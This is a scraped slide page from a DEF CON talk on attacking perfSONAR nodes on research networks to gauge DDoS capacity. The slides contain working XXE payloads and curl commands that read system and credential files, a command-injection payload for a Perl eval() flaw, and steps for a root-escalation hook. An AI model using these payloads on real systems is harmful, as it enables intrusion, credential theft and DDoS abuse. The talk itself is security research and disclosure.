SlideShare a Scribd company logo

Attacking Network Infrastructure to Generate a 4 Tbs DDoS

M
mark-smith

As bandwidth, computing power, and software advancements have improved over the years, we've begun to see larger and larger DDoS attacks against organizations. Often times these attacks employ techniques such as DNS Amplification to take advantage of servers with very large uplinks.

1 of 60
Download to read offline
ATTACKING NETWORK INFRASTRUCTURE TO GENERATE A 4 TB/S DDOS FOR $5 by Luke Young
$ WHOAMI ➤ Undergraduate Student - Junior ➤ 2nd year at DEF CON ➤ Website: bored.engineer ➤ Email: me@bored.engineer ➤ LinkedIn: https://www.linkedin.com/in/bored-engineer ➤ Twitter: @TheBoredEng
DISCLAIMER ➤ The views and opinions expressed in this presentation are those of the authors and do not necessarily reflect the official policy or position of any current or previous employer. Examples of exploitation performed within this presentation are only examples and they should not be utilized in the real-world.
AGENDA ➤ What is Internet2? ➤ What is perfSONAR? ➤ Exploiting perfSONAR ➤ Privilege Escalation to root ➤ Enumerating perfSONAR Instances ➤ Code Release and Q&A
BACKSTORY ➤ “The Internet is a global system of interconnected networks. The University connects to both the global Internet and a number of special research and education networks commonly referred to as Internet2. These networks provide high bandwidth connectivity enabling and supporting research collaborations and educational opportunities regionally, nationally, and around the world.”
WHAT IS A INTERNET2? ➤ “Internet2 is an exceptional community of U.S. and international leaders in research, academia, industry and government who create and collaborate via innovative technologies. Together, we accelerate research discovery, advance national and global education, and improve the delivery of public services.” ➤ 282 - Higher Education ➤ 86 - Corporations ➤ 66 - Affiliate members (Governments) ➤ 42 - Regional and State Education Networks
➤ Lookout ➤ Office 365 ➤ Rackspace ➤ SoftLayer ➤ Splunk ➤ VMWare ➤ Zoom WHAT IS A INTERNET2? ➤ AWS ➤ Azure ➤ Box ➤ Dropbox ➤ DocuSign ➤ Duo Security ➤ LastPass
WHAT IS A INTERNET2?
INTERNET2 PRODUCTS ➤ Trust Identity & Middleware ➤ InCommon Federation ➤ Shibboleth ➤ Performance & Analytics ➤ BWCTL - Bandwidth Test Controller ➤ NDT - Network Diagnostic Tool ➤ OWAMP - One-Way Ping ➤ perfSONAR - pS-Performance Toolkit
ATTACKING PERFSONAR
PERFSONAR ISSUE #783
PERFSONAR ISSUE #783
XML EXTERNAL ENTITY PROCESSING (XXE) <?xml version="1.0"?> <!DOCTYPE author [ <!ELEMENT author (#PCDATA)> <!ENTITY ly "Luke Young"> ]> <presentations> <presentation> <name>Investigating the Practicality and Cost of Abusing Memory Errors</name> <location>DEF CON 23</location> <author>&ly;</author> </presentation> <presentation> <name>Attacking Network Infrastructure to Generate a 4 Tb/s DDoS for $5</name> <location>DEF CON 24</location> <author>&ly;</author> </presentation> </presentations>
XML EXTERNAL ENTITY PROCESSING (XXE) <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>
XML EXTERNAL ENTITY PROCESSING (XXE) <?xml version="1.0"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <foo>&xxe;</foo>
PERFSONAR ISSUE #783
PERFSONAR ISSUE #783 REBORN
PERFSONAR ISSUE #783 REBORN <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/"> <nmwg:data> &xxe; </nmwg:data> </nmwg:message> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
PERFSONAR ISSUE #783 REBORN <SOAP-ENV:Envelope xmlns:SOAP-ENV=“http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/" xmlns:nmwgr="http://ggf.org/ns/nmwg/result/2.0/" type=“ErrorResponse"> <nmwg:data>root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin ... pulse:x:489:492:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin admin:x:500:505::/home/admin:/bin/bash sudo:x:501:506::/home/sudo:/bin/bash </nmwg:data> <nmwg:metadata id=“return_message"> <nmwg:eventType>error.nmwg.action_not_supported</nmwg:eventType> </nmwg:metadata> <nmwg:data metadataIdRef="return_message" id=“data_return_message"> <nmwgr:datum>Unknown messagetype: </nmwgr:datum> </nmwg:data> </nmwg:message> </SOAP-ENV:Body> </SOAP-ENV:Envelope> curl -X POST -d @passwd.xml http://perfSONAR:8090/
PERFSONAR ISSUE #783 REBORN <soapenv:Envelope xmlns:soapenv=“http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Body> <soapenv:Fault> <faultcode>soapenv:Server.Internal</faultcode> <faultstring>Error parsing message: I/O error : Permission denied I/O error : Permission denied :1: parser error : Failure to process entity xxe g:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/"&gt; &lt;nmwg:data&gt; &amp;xxe; ^ :1: parser error : Entity 'xxe' not defined g:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/"&gt; &lt;nmwg:data&gt; &amp;xxe; ^ at /opt/perfsonar_ps/oppd_mp/bin/oppd.pl line 760 </faultstring> </soapenv:Fault> </soapenv:Body> </soapenv:Envelope> curl -X POST -d @shadow.xml http://perfSONAR:8090/
PERFSONAR ISSUE #783 REBORN <SOAP-ENV:Envelope xmlns:SOAP-ENV=“http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/" xmlns:nmwgr="http://ggf.org/ns/nmwg/result/2.0/" type=“ErrorResponse"> <nmwg:data>[main] sql_db_engine = django.db.backends.postgresql_psycopg2 sql_db_name = esmond sql_db_user = esmond sql_db_password = 7hc4m1 tsdb_root = %(ESMOND_ROOT)s/tsdb-data ... </nmwg:data> <nmwg:metadata id=“return_message"> <nmwg:eventType>error.nmwg.action_not_supported</nmwg:eventType> </nmwg:metadata> <nmwg:data metadataIdRef="return_message" id=“data_return_message"> <nmwgr:datum>Unknown messagetype: </nmwgr:datum> </nmwg:data> </nmwg:message> </SOAP-ENV:Body> </SOAP-ENV:Envelope> curl -X POST -d @esmond.xml http://perfSONAR:8090/
PERFSONAR EXPLOITATION ➤ XXS and XXE abundant ➤ RCE seemed impossible
PERFSONAR - BANDWIDTHGRAPH.CGI
PERFSONAR - BANDWIDTHGRAPH.CGI if ( scalar @childnodes == 1 ) { if ( $child->textContent =~ m/(E|e)rror/ || $child->textContent =~ m/Query returned 0 results/ ) { next; } } my %tsresult = (); my $throughput = eval( $child->getAttribute("throughput") ); my $eTime = $child->getAttribute("timeValue"); my $etimestamp; }
EXPLOITING PERFSONAR
PERFSONAR - BANDWIDTHGRAPH.CGI <nmwg:data id="data.16870844" metadataIdRef="metadata.7441249" xmlns:nmwg="http:// ggf.org/ns/nmwg/base/2.0/"> <iperf:datum throughput="8.23811e+08" timeType="iso" timeValue="Tue Oct 19 15:18:29.823998065 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.0573e+08" timeType="iso" timeValue="Tue Oct 19 16:17:55.2163317044 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.29349e+08" timeType="iso" timeValue="Tue Oct 19 17:17:55.3262506549 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.24512e+08" timeType="iso" timeValue="Tue Oct 19 18:20:02.81157432 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="9.04838e+08" timeType="iso" timeValue="Tue Oct 19 19:17:56.3379084847 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.16295e+08" timeType="iso" timeValue="Tue Oct 19 22:21:00.284368039 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.32728e+08" timeType="iso" timeValue="Tue Oct 19 23:17:55.2126511324 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.18147e+08" timeType="iso" timeValue="Wed Oct 20 04:19:43.2927588221 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> </nmwg:data>
PERFSONAR - BANDWIDTHGRAPH.CGI my $cgi = new CGI; my $ma_url = $cgi->param('url'); my $key = $cgi->param('key'); ... if ( !defined $ma_url ) { print $cgi->header; my $errmsg = "Missing MA_URL"; my $errfile = HTML::Template->new( filename => "$basetmpldir/bw_error.tmpl" ); $errfile->param( ERRORMSG => $errmsg ); print $errfile->output; exit(1); } ... if ( !defined $key ) { ... if(!$key){ print $cgi->header; my $errmsg = "Unable to find matching MA key for provided parameters"; my $errfile = HTML::Template->new( filename => "$basetmpldir/bw_error.tmpl" ); $errfile->param( ERRORMSG => $errmsg ); print $errfile->output; exit(1); } }
PERFSONAR - BANDWIDTHGRAPH.CGI my $res = &getData( $ma_url, $key, $start, $end ); ... sub getData() { foreach my $k (@keyList){ my $ma = new perfSONAR_PS::Client::MA( { instance => $ma_url } ); ... my $result = $ma->setupDataRequest( ... );
 ... my @childnodes = $root->findnodes("./*[local-name()='datum']"); ... foreach my $child (@childnodes) { ... my $throughput = eval( $child->getAttribute("throughput") ); ... } } }
PERFSONAR - BANDWIDTHGRAPH.CGI <SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/" id="message. 3046685" type=“EchoRequest"> <nmwg:metadata id=“metadata.12999789"> <nmwg:eventType>http://schemas.perfsonar.net/tools/admin/echo/2.0</ nmwg:eventType> </nmwg:metadata> <nmwg:data metadataIdRef="metadata.12999789" id=“data.1942969”></nmwg:data> </nmwg:message> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
PERFSONAR - BANDWIDTHGRAPH.CGI <SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/"> <nmwg:metadata id="metadata.1337"> <nmwg:eventType>success.test</nmwg:eventType> </nmwg:metadata> <nmwg:data metadataIdRef="metadata.1337"> <iperf:datum throughput="`whoami`" timeValue="1 1 1 1:1:1 1" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"> </nmwg:data> </nmwg:message> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
PERFSONAR - BANDWIDTHGRAPH.CGI
PERFSONAR - OBTAINING ROOT
PERFSONAR - ROOT?
PERFSONAR - CONFIGMANAGER
PERFSONAR - CONFIGMANAGER
PERFSONAR - CONFIGMANAGER
PERFSONAR - CONFIGMANAGER
PERFSONAR - CONFIGMANAGER ➤ /etc/hosts ➤ /etc/ntp.conf ➤ /etc/ntp/step-tickers ➤ /etc/bwctld/bwctld.conf ➤ /etc/bwctld/bwctld.limits ➤ /etc/owampd/owampd.limits ➤ /usr/ndt/tcpbw100.html ➤ /opt/perfsonar_ps/ls_registration_daemon/ etc/ls_registration_daemon.conf ➤ /opt/perfsonar_ps/regular_testing/etc/ regular_testing.conf ➤ /opt/perfsonar_ps/toolkit/etc/ administrative_info ➤ /opt/perfsonar_ps/toolkit/etc/ enabled_services ➤ /opt/perfsonar_ps/toolkit/etc/ external_addresses ➤ /opt/perfsonar_ps/toolkit/etc/ ntp_known_servers
PERFSONAR - CONFIGMANAGER
Backup original bwctld.conf Use ConfigManager to stop bwctld Write executable posthook.pl Use ConfigManager to write new bwctld.conf Use ConfigManager to start bwctld PERFSONAR - CONFIGMANAGER Trigger a bwctl session, triggering posthook.pl as root Use ConfigManager to stop bwctld Remove posthook.pl Restore original bwctld.conf Use ConfigManager to start bwctld back to original configuration
PERFSONAR - CONFIGMANAGER
ENUMERATING PERFSONAR INSTANCES
ESTIMATING THE PERFSONAR NETWORK CAPACITY
ESTIMATING THE PERFSONAR NETWORK CAPACITY
ESTIMATING THE PERFSONAR NETWORK CAPACITY
ESTIMATING THE PERFSONAR NETWORK CAPACITY
ESTIMATING THE PERFSONAR NETWORK CAPACITY
PERFSONAR NETWORK MAPPING
MAP.GO / PS-SPLUNK
PERFSONAR NETWORK SUMMARY ➤ 970 Publicly routable nodes ➤ 12.51 TB of RAM ➤ 29.85 THz CPU Cycles ➤ Average Node: ➤ 13 GB of RAM ➤ 12 Cores at 2.6 GHz
PERFSONAR THEORETICAL NETWORK SPEED 5.719 Tb/s
CALCULATING ACTUAL NETWORK SPEED
CALCULATING ACTUAL NETWORK SPEED ➤ Enumerate all perfSONAR instances and their maximum interface speed ➤ Calculate instance location from GeoIP ➤ Match 5 closest instances of same or faster interface speed
CALCULATING ACTUAL NETWORK SPEED ➤ index=ps sourcetype=ps-summary | dedup ls_client_uuid | rename external_address.address as address, external_address.speed as speed, services{}.enabled as enabled | where mvindex(enabled,0)="1" | fillnull value=10000000000 speed | iplocation address | map maxsearches=100000 search="search index=ps sourcetype=ps-summary | dedup ls_client_uuid | rename services{}.enabled as peer_enabled | eval peer_enabled = mvindex(peer_enabled,0) | where peer_enabled="1" | eval address=$address$, speed=$speed$ | rename external_address.address as peer_address, external_address.speed as peer_speed | fillnull value=10000000000 peer_speed | where peer_address!=address AND peer_speed >= speed | eval lat=$lat$, lon=$lon$ | iplocation prefix=peer_ peer_address | eval distance=sqrt(pow(lat-peer_lat,2)+pow(lon-peer_lon,2)) | where distance!=0 | sort distance | head 5 | fields address, speed, peer_address, peer_speed, distance" | table address, speed, peer_address, peer_speed, distance
CALCULATING ACTUAL NETWORK SPEED ➤ Never run 2 tests with the same instance at the same time ➤ Never run more than 10 tests at the same time ➤ Never test a host that doesn’t have bwctl enabled
PERFSONAR ACTUAL NETWORK SPEED 3.703 Tb/s
LIVE DEMO
CONCLUSION ➤ oppd (XXE) - unresolved ➤ bandwidthGraph.cgi (RCE) - fixed by perfSONAR 3.5.1 on March 3rd ➤ ConfigDaemon (PrivEsc) - unresolved
CONCLUSION ➤ GitHub: http://www.github.com/bored-engineer ➤ Email: me@bored.engineer ➤ LinkedIn: https://www.linkedin.com/in/bored-engineer ➤ Twitter: @TheBoredEng

Recommended

Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentThreat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Nahidul Kibria
 
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...
Felipe Prado
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz
PROIDEA
 
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
OpenDNS
 
Mezi snem a realitou. Otevřená data českého webového archivu.
Mezi snem a realitou. Otevřená data českého webového archivu.Mezi snem a realitou. Otevřená data českého webového archivu.
Mezi snem a realitou. Otevřená data českého webového archivu.
Webarchive of National Library of the Czech Republic
 
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
APNIC
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basic
MksYi
 
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
SecuRing
 

Recommended

Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentThreat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Nahidul Kibria
 
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...
DEF CON 27 - GERALD DOUSSOT AND ROGER MEYER - state of dns rebinding attack ...
Felipe Prado
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz
PROIDEA
 
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
OpenDNS
 
Mezi snem a realitou. Otevřená data českého webového archivu.
Mezi snem a realitou. Otevřená data českého webového archivu.Mezi snem a realitou. Otevřená data českého webového archivu.
Mezi snem a realitou. Otevřená data českého webového archivu.
Webarchive of National Library of the Czech Republic
 
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
IBCAST 2021: Observations and lessons learned from the APNIC Community Honeyn...
APNIC
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basic
MksYi
 
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
SecuRing
 
Reversing Engineering a Web Application - For fun, behavior and detection
Reversing Engineering a Web Application - For fun, behavior and detectionReversing Engineering a Web Application - For fun, behavior and detection
Reversing Engineering a Web Application - For fun, behavior and detection
Rodrigo Montoro
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?
Graham Charters
 
Learning the basics of Apache NiFi for iot OSS Europe 2020
Learning the basics of Apache NiFi for iot OSS Europe 2020Learning the basics of Apache NiFi for iot OSS Europe 2020
Learning the basics of Apache NiFi for iot OSS Europe 2020
Timothy Spann
 
Network Security Data Visualization
Network Security Data VisualizationNetwork Security Data Visualization
Network Security Data Visualization
ssusercb4686
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
guest3379bd
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
Fedir RYKHTIK
 
HARDENING IN APACHE WEB SERVER
HARDENING IN APACHE WEB SERVERHARDENING IN APACHE WEB SERVER
HARDENING IN APACHE WEB SERVER
Utah Networxs Consultoria e Treinamento
 
Incrementalism: An Industrial Strategy For Adopting Modern Automation
Incrementalism: An Industrial Strategy For Adopting Modern AutomationIncrementalism: An Industrial Strategy For Adopting Modern Automation
Incrementalism: An Industrial Strategy For Adopting Modern Automation
Sean Chittenden
 
Terraform in action
Terraform in actionTerraform in action
Terraform in action
Damien Pacaud
 
JLeRN Paradata Challenge at Dev8D 2012
JLeRN Paradata Challenge at Dev8D 2012JLeRN Paradata Challenge at Dev8D 2012
JLeRN Paradata Challenge at Dev8D 2012
Bharti Gupta
 
PPT
PPTPPT
PPT
Videoguy
 
Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014
Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014
Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014
Puppet
 
Tips And Tricks For Bioinformatics Software Engineering
Tips And Tricks For Bioinformatics Software EngineeringTips And Tricks For Bioinformatics Software Engineering
Tips And Tricks For Bioinformatics Software Engineering
jtdudley
 
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...
Docker, Inc.
 
Ten practical ways to improve front-end performance
Ten practical ways to improve front-end performanceTen practical ways to improve front-end performance
Ten practical ways to improve front-end performance
Andrew Rota
 
Anomaly Detection at Scale
Anomaly Detection at ScaleAnomaly Detection at Scale
Anomaly Detection at Scale
Jeff Henrikson
 
Linked Data Tutorial
Linked Data TutorialLinked Data Tutorial
Linked Data Tutorial
Michael Hausenblas
 
Modern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxModern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a Fox
C4Media
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous Environment
Stefano Maccaglia
 
Information Retrieval and Extraction
Information Retrieval and ExtractionInformation Retrieval and Extraction
Information Retrieval and Extraction
Christopher Frenz
 
How Your DRAM Becomes a Security Problem
How Your DRAM Becomes a Security ProblemHow Your DRAM Becomes a Security Problem
How Your DRAM Becomes a Security Problem
mark-smith
 
Remotely Compromising iOS via Wi-Fi and Escaping the Sandbox
Remotely Compromising iOS via Wi-Fi and Escaping the SandboxRemotely Compromising iOS via Wi-Fi and Escaping the Sandbox
Remotely Compromising iOS via Wi-Fi and Escaping the Sandbox
mark-smith
 

More Related Content

Similar to Attacking Network Infrastructure to Generate a 4 Tbs DDoS

Reversing Engineering a Web Application - For fun, behavior and detection
Reversing Engineering a Web Application - For fun, behavior and detectionReversing Engineering a Web Application - For fun, behavior and detection
Reversing Engineering a Web Application - For fun, behavior and detection
Rodrigo Montoro
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?
Graham Charters
 
Learning the basics of Apache NiFi for iot OSS Europe 2020
Learning the basics of Apache NiFi for iot OSS Europe 2020Learning the basics of Apache NiFi for iot OSS Europe 2020
Learning the basics of Apache NiFi for iot OSS Europe 2020
Timothy Spann
 
Network Security Data Visualization
Network Security Data VisualizationNetwork Security Data Visualization
Network Security Data Visualization
ssusercb4686
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
guest3379bd
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
Fedir RYKHTIK
 
HARDENING IN APACHE WEB SERVER
HARDENING IN APACHE WEB SERVERHARDENING IN APACHE WEB SERVER
HARDENING IN APACHE WEB SERVER
Utah Networxs Consultoria e Treinamento
 
Incrementalism: An Industrial Strategy For Adopting Modern Automation
Incrementalism: An Industrial Strategy For Adopting Modern AutomationIncrementalism: An Industrial Strategy For Adopting Modern Automation
Incrementalism: An Industrial Strategy For Adopting Modern Automation
Sean Chittenden
 
Terraform in action
Terraform in actionTerraform in action
Terraform in action
Damien Pacaud
 
JLeRN Paradata Challenge at Dev8D 2012
JLeRN Paradata Challenge at Dev8D 2012JLeRN Paradata Challenge at Dev8D 2012
JLeRN Paradata Challenge at Dev8D 2012
Bharti Gupta
 
PPT
PPTPPT
PPT
Videoguy
 
Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014
Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014
Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014
Puppet
 
Tips And Tricks For Bioinformatics Software Engineering
Tips And Tricks For Bioinformatics Software EngineeringTips And Tricks For Bioinformatics Software Engineering
Tips And Tricks For Bioinformatics Software Engineering
jtdudley
 
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...
Docker, Inc.
 
Ten practical ways to improve front-end performance
Ten practical ways to improve front-end performanceTen practical ways to improve front-end performance
Ten practical ways to improve front-end performance
Andrew Rota
 
Anomaly Detection at Scale
Anomaly Detection at ScaleAnomaly Detection at Scale
Anomaly Detection at Scale
Jeff Henrikson
 
Linked Data Tutorial
Linked Data TutorialLinked Data Tutorial
Linked Data Tutorial
Michael Hausenblas
 
Modern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxModern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a Fox
C4Media
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous Environment
Stefano Maccaglia
 
Information Retrieval and Extraction
Information Retrieval and ExtractionInformation Retrieval and Extraction
Information Retrieval and Extraction
Christopher Frenz
 

Similar to Attacking Network Infrastructure to Generate a 4 Tbs DDoS (20)

Reversing Engineering a Web Application - For fun, behavior and detection
Reversing Engineering a Web Application - For fun, behavior and detectionReversing Engineering a Web Application - For fun, behavior and detection
Reversing Engineering a Web Application - For fun, behavior and detection
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?
 
Learning the basics of Apache NiFi for iot OSS Europe 2020
Learning the basics of Apache NiFi for iot OSS Europe 2020Learning the basics of Apache NiFi for iot OSS Europe 2020
Learning the basics of Apache NiFi for iot OSS Europe 2020
 
Network Security Data Visualization
Network Security Data VisualizationNetwork Security Data Visualization
Network Security Data Visualization
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
 
HARDENING IN APACHE WEB SERVER
HARDENING IN APACHE WEB SERVERHARDENING IN APACHE WEB SERVER
HARDENING IN APACHE WEB SERVER
 
Incrementalism: An Industrial Strategy For Adopting Modern Automation
Incrementalism: An Industrial Strategy For Adopting Modern AutomationIncrementalism: An Industrial Strategy For Adopting Modern Automation
